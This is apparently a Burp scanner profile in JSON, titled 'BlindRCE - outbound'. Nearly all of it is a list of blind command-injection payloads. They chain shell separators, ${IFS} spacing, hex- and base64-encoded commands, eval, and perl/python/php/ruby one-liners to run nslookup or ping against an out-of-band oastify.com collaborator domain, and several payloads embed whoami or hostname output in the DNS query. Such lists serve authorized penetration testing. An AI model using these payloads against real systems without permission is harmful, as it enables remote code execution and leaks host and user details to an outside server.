[
  {
    "ProfileName": "BlindRCE - outbound",
    "Name": "",
    "Enabled": false,
    "Scanner": 1,
    "Author": "@egarme",
    "Payloads": [
      "true,|| ping -c 2 aa.a.{CBC}",
      "true,| ping -c 2 ab.b.{CBC}",
      "true,; ping -c 2 ac.c.{CBC}",
      "true,\u0026\u0026 ping -c 2 ad.d.{CBC}",
      "true,\u0026 ping -c 2 ae.e.{CBC}",
      "true,; (nslookup af.f.{CBC} \u0026)",
      "true,; (nslookup ag.g.{CBC}) ",
      "true,; { nslookup ah.h.{CBC}; }",
      "true,; nslookup ai.i.{CBC}   ",
      "true,; nslookup aj.j.{CBC} \u0026 #",
      "true,; nslookup ak.k.{CBC} \u0026\u003e /dev/null #",
      "true,; nslookup al.l.{CBC} # ",
      "true,; nslookup am.m.{CBC} \u003e /dev/null  ",
      "true,; nslookup an.n.{CBC} \u003e /dev/null #",
      "true,;(nslookup${IFS}ao.o.{CBC})  ",
      "true,;nslookup${IFS}ap.p.{CBC}  ",
      "true,;nslookup${IFS}aq.q.{CBC}#  ",
      "true,;nslookup${IFS}ar.r.{CBC}\u003e/dev/null  ",
      "true,;nslookup${IFS}as.s.{CBC}\u0026\u003e/dev/null#  ",
      "true,\u0027; $(nslookup at.t.{CBC}) #",
      "true,\u0027; nslookup au.u.{CBC} \u0026 # ",
      "true,\u0027; nslookup av.v.{CBC} #   ",
      "true,\u0027; nslookup aw.w.{CBC} \u003e /dev/null #",
      "true,\u0027; nslookup ax.x.{CBC}; echo \u0027",
      "true,\u0027;nslookup${IFS}ay.y.{CBC}#  ",
      "true,\u0027;nslookup${IFS}az.z.{CBC};echo\u0027  ",
      "true,\"; (nslookup ba.1.{CBC}) #",
      "true,\"; $(nslookup bb.2.{CBC}) #",
      "true,\"; nslookup bc.3.{CBC} \u0026 # ",
      "true,\"; nslookup bd.4.{CBC} #",
      "true,\"; nslookup be.5.{CBC}; echo \"",
      "true,\";nslookup${IFS}bf.6.{CBC}#  ",
      "true,\";nslookup${IFS}bg.7.{CBC};echo\"  ",
      "true,\";nslookup${IFS}bh.8.{CBC}\u0026 #  ",
      "true,\u0026 nslookup bi.9.{CBC}   ",
      "true,\u0026 nslookup bj.10.{CBC} #",
      "true,\u0026\u0026 (nslookup bk.11.{CBC})  ",
      "true,\u0026\u0026 $(nslookup bl.12.{CBC}) #",
      "true,\u0026\u0026 nslookup bm.13.{CBC}  ",
      "true,\u0026\u0026 nslookup bn.14.{CBC} #",
      "true,\u0026\u0026 nslookup bo.15.{CBC} \u003e /dev/null ",
      "true,\u0026\u0026$(nslookup${IFS}bp.16.{CBC}\u003e/dev/null)  ",
      "true,\u0026\u0026nslookup${IFS}bq.17.{CBC}  ",
      "true,\u0026\u0026nslookup${IFS}br.18.{CBC}#  ",
      "true,\u0026nslookup${IFS}bs.19.{CBC}  ",
      "true,`nslookup bt.20.{CBC} \u0026`",
      "true,`nslookup bu.21.{CBC} \u0026\u003e /dev/null`",
      "true,`nslookup bv.22.{CBC}`",
      "true,`nslookup${IFS}bw.23.{CBC}`  ",
      "true,| `nslookup bx.24.{CBC}` #",
      "true,| nslookup by.25.{CBC}   ",
      "true,| nslookup bz.26.{CBC} # ",
      "true,|| nslookup ca.27.{CBC}  ",
      "true,|| nslookup cb.28.{CBC} #",
      "true,|| nslookup cc.29.{CBC} 2\u003e /dev/null",
      "true,||nslookup${IFS}cd.30.{CBC}  ",
      "true,|nslookup${IFS}ce.31.{CBC}  ",
      "true,|nslookup${IFS}cf.32.{CBC}#  ",
      "true,$(nslookup cg.33.{CBC} \u0026)",
      "true,$(nslookup ch.34.{CBC}; echo \"\")",
      "true,$(nslookup ci.35.{CBC})",
      "true,$(nslookup${IFS}cj.36.{CBC})  ",
      "true,$(nslookup${IFS}ck.37.{CBC}\u0026)",
      "true,; a\u003dnslookup; b\u003dcl.38.{CBC}; $a${IFS}$b",
      "true,; eval \"nslookup${IFS}cm.39.{CBC}\"",
      "true,; function f() { nslookup cn.40.{CBC}; }; f",
      "true,; cmd\u003d(nslookup co.41.{CBC}); \"${cmd[@]}\"",
      "true,; time nslookup cp.42.{CBC}",
      "true,; setsid nslookup cq.43.{CBC}",
      "true,; alias n\u003dnslookup; n cr.44.{CBC}",
      "true,; eval $\u0027\\x6e\\x73\\x6c\\x6f\\x6f\\x6b\\x75\\x70\u0027${IFS}\u0027cs.45.{CBC}\u0027",
      "true,`; printf \"nslookup ct.46.{CBC}\\n\"",
      "true,; { nslookup cu.47.{CBC}; }",
      "true,;;`nslookup${IFS}$(whoami).cv.48.{CBC}`;;",
      "true,;$(nslookup${IFS}$(whoami).cw.49.{CBC}) \u0026\u0026",
      "true,;$(`nslookup${IFS}cx.50.{CBC}`) ||",
      "true,;;$(nslookup${IFS}$(hostname).cy.51.{CBC});;",
      "true,;$(X\u003d$\u0027nslookup${IFS}cz.52.{CBC}\u0027 \u0026\u0026 $X) \u0026",
      "true,;$(eval${IFS}$\u0027\\x6e\\x73\\x6c\\x6f\\x6f\\x6b\\x75\\x70${IFS}$(whoami).da.53.{CBC}\u0027) ;;",
      "true,;;`nslookup${IFS}db.54.{CBC} \u003e /dev/null`;;",
      "true,;$(nslookup${IFS}$(whoami).dc.55.{CBC} \u0026)",
      "true,;`$(nslookup${IFS}$(hostname).dd.56.{CBC})` \u0026\u0026",
      "true,;$(nslookup${IFS}de.57.{CBC}; echo) ||",
      "true,;$(nslookup${IFS}$(whoami).df.58.{CBC} #) ;;",
      "true,;;$(nslookup${IFS}dg.59.{CBC} \u0026\u003e/dev/null);;",
      "true,;`nslookup${IFS}$(whoami).dh.60.{CBC}` \u0026",
      "true,;$(nslookup${IFS}$(whoami).di.61.{CBC}${IFS}--) \u0026\u0026",
      "true,;$(`nslookup${IFS}$(hostname).dj.62.{CBC}`) ||",
      "true,||;$(`nslookup${IFS}$(hostname).dk.63.{CBC}`) ||",
      "true,;;$(nslookup${IFS}dl.64.{CBC}) | $(nslookup${IFS}dm.65.{CBC});;",
      "true,;$(nslookup${IFS}$(whoami).dn.66.{CBC} || nslookup${IFS}do.67.{CBC}) \u0026",
      "true,;$(`nslookup${IFS}dp.68.{CBC} \u0026\u0026 nslookup${IFS}$(whoami).dq.69.{CBC}`) ;;",
      "true,;;`$(nslookup${IFS}$(whoami).dr.70.{CBC})`;;",
      "true,;$(nslookup${IFS}$(hostname).ds.71.{CBC} \u0026\u003e/dev/null) \u0026\u0026",
      "true,||nslookup dt.72.{CBC}||",
      "true,;;`nslookup${IFS}$(whoami).hf.164.{CBC}`;;",
      "true,;$(nslookup${IFS}$(whoami).hg.165.{CBC}) \u0026\u0026",
      "true,;$(`nslookup${IFS}hh.166.{CBC}`) ||",
      "true,;;$(nslookup${IFS}$(hostname).hi.167.{CBC});;",
      "true,;$(X\u003d$\u0027nslookup${IFS}hj.168.{CBC}\u0027 \u0026\u0026 $X) \u0026",
      "true,;$(eval${IFS}$\u0027\\x6e\\x73\\x6c\\x6f\\x6f\\x6b\\x75\\x70${IFS}$(whoami).hk.169.{CBC}\u0027) ;;",
      "true,;;`nslookup${IFS}hl.170.{CBC} \u003e /dev/null`;;",
      "true,;$(nslookup${IFS}$(whoami).hm.171.{CBC} \u0026)",
      "true,;`$(nslookup${IFS}$(hostname).hn.172.{CBC})` \u0026\u0026",
      "true,;$(nslookup${IFS}ho.173.{CBC}; echo) ||",
      "true,;$(nslookup${IFS}$(whoami).hp.174.{CBC} #) ;;",
      "true,;;$(nslookup${IFS}hq.175.{CBC} \u0026\u003e/dev/null);;",
      "true,;`nslookup${IFS}$(whoami).hr.176.{CBC}` \u0026",
      "true,;$(nslookup${IFS}$(whoami).hs.177.{CBC}${IFS}--) \u0026\u0026",
      "true,;$(`nslookup${IFS}$(hostname).ht.178.{CBC}`) ||",
      "true,||;$(`nslookup${IFS}$(hostname).hu.179.{CBC}`) ||",
      "true,;;$(nslookup${IFS}hv.180.{CBC}) | $(nslookup${IFS}hw.181.{CBC});;",
      "true,;$(nslookup${IFS}$(whoami).hx.182.{CBC} || nslookup${IFS}hy.183.{CBC}) \u0026",
      "true,;$(`nslookup${IFS}hz.184.{CBC} \u0026\u0026 nslookup${IFS}$(whoami).ia.185.{CBC}`) ;;",
      "true,;;`$(nslookup${IFS}$(whoami).ib.186.{CBC})`;;",
      "true,;$(nslookup${IFS}$(hostname).ic.187.{CBC} \u0026\u003e/dev/null) \u0026\u0026",
      "true,||nslookup id.188.{CBC}||",
      "true,; echo -e \"\\x6e\\x73\\x6c\\x6f\\x6f\\x6b\\x75\\x70\" go.147.{CBC} | bash",
      "true,; printf \"nslookup gp.148.{CBC}\\n\" | sh",
      "true,; eval $\u0027\\x6e\\x73\\x6c\\x6f\\x6f\\x6b\\x75\\x70${IFS}gq.149.{CBC}\u0027",
      "true,; base64 -d \u003c\u003c\u003c\"bnNsb29rdXAgZ3IuMTUwLntDQkN9\" | bash",
      "true,; `$(nslookup gf.138.{CBC})`",
      "true,; `eval $(nslookup gg.139.{CBC})`",
      "true,; $(echo $(nslookup gh.140.{CBC}))",
      "true,; `echo $(nslookup gi.141.{CBC})`",
      "true,; $(eval echo $(nslookup gj.142.{CBC}))",
      "true,||nslookup fw.129.{CBC}||",
      "true,\u0026\u0026nslookup fx.130.{CBC}\u0026\u0026",
      "true,\u0026 nslookup fy.131.{CBC} \u0026",
      "true,| nslookup fz.132.{CBC} |",
      "true,; nslookup ga.133.{CBC} ;",
      "true,\u0026\u0026 nslookup gb.134.{CBC} \u0026\u0026",
      "true,X\u003dnslookup; Y\u003dfm.119.{CBC}; $X${IFS}$Y",
      "true,eval \"nslookup${IFS}fn.120.{CBC}\"",
      "true,a\u003dnslookup; b\u003dfo.121.{CBC}; $a${IFS}$b",
      "true,cmd\u003d(nslookup fp.122.{CBC}); \"${cmd[@]}\"",
      "true,\u0027nslookup ez.105.{CBC}\u0027",
      "true,\"nslookup fa.106.{CBC}\"",
      "true,\u0027$(nslookup fb.107.{CBC})\u0027",
      "true,\"$(nslookup fc.108.{CBC})\"",
      "true,\u0027`nslookup fd.109.{CBC}`\u0027",
      "true,\"`nslookup fe.110.{CBC}`\"",
      "true,; (nslookup er.97.{CBC})",
      "true,$(nslookup es.98.{CBC})",
      "true,`nslookup et.99.{CBC}`",
      "true,`echo $(nslookup eu.100.{CBC})`",
      "true,$(echo nslookup ev.101.{CBC})",
      "true,`nslookup ec.82.{CBC} \u0026`",
      "true,`nslookup ed.83.{CBC} \u003e /dev/null`",
      "true,; $(nslookup ee.84.{CBC})",
      "true,; $(nslookup${IFS}ef.85.{CBC})",
      "true,; eval \"nslookup${IFS}eg.86.{CBC}\"",
      "true,; function f() { nslookup eh.87.{CBC}; }; f",
      "true,; alias n\u003dnslookup; n ei.88.{CBC}",
      "true,; setsid nslookup ej.89.{CBC}",
      "true,; nohup nslookup ek.90.{CBC} \u0026",
      "true,; screen -d -m nslookup el.91.{CBC}",
      "true,; (exec nslookup em.92.{CBC})",
      "true,; perl -e \u0027system(\"nslookup en.93.{CBC}\")\u0027",
      "true,; python -c \u0027import os; os.system(\"nslookup eo.94.{CBC}\")\u0027",
      "true,; php -r \u0027system(\"nslookup ep.95.{CBC}\");\u0027",
      "true,; ruby -e \u0027system(\"nslookup eq.96.{CBC}\")\u0027"
    ],
    "Encoder": [
      "URL-encode key characters"
    ],
    "UrlEncode": false,
    "CharsToUrlEncode": "",
    "Grep": [],
    "Tags": [
      "Collaborator",
      "RCE",
      "All"
    ],
    "PayloadResponse": false,
    "NotResponse": false,
    "TimeOut1": "",
    "TimeOut2": "",
    "isTime": false,
    "contentLength": "",
    "iscontentLength": false,
    "CaseSensitive": false,
    "ExcludeHTTP": false,
    "OnlyHTTP": false,
    "IsContentType": false,
    "ContentType": "",
    "HttpResponseCode": "",
    "NegativeCT": false,
    "IsResponseCode": false,
    "ResponseCode": "",
    "NegativeRC": false,
    "urlextension": "",
    "isurlextension": false,
    "NegativeUrlExtension": false,
    "MatchType": 1,
    "Scope": 0,
    "RedirType": 4,
    "MaxRedir": 0,
    "payloadPosition": 2,
    "payloadsFile": "",
    "grepsFile": "",
    "IssueName": "BlindRCE - Outbound",
    "IssueSeverity": "High",
    "IssueConfidence": "Certain",
    "IssueDetail": "RCE with el payloads: \u003cbr\u003e  \u003cpayload\u003e",
    "RemediationDetail": "",
    "IssueBackground": "",
    "RemediationBackground": "",
    "Header": [
      {
        "type": "Payload",
        "match": "{CBC}",
        "replace": "hezotkuhxg27in6ufuiimco32u8lwfk4.oastify.com",
        "regex": "String"
      }
    ],
    "VariationAttributes": [],
    "InsertionPointType": [
      18,
      65,
      32,
      36,
      7,
      1,
      2,
      6,
      33,
      5,
      35,
      34,
      64,
      0,
      3,
      4,
      37,
      127,
      65,
      32,
      36,
      7,
      1,
      2,
      6,
      33,
      5,
      35,
      34,
      64,
      0,
      3,
      4,
      37,
      127
    ],
    "Scanas": false,
    "Scantype": 0,
    "pathDiscovery": false
  }
]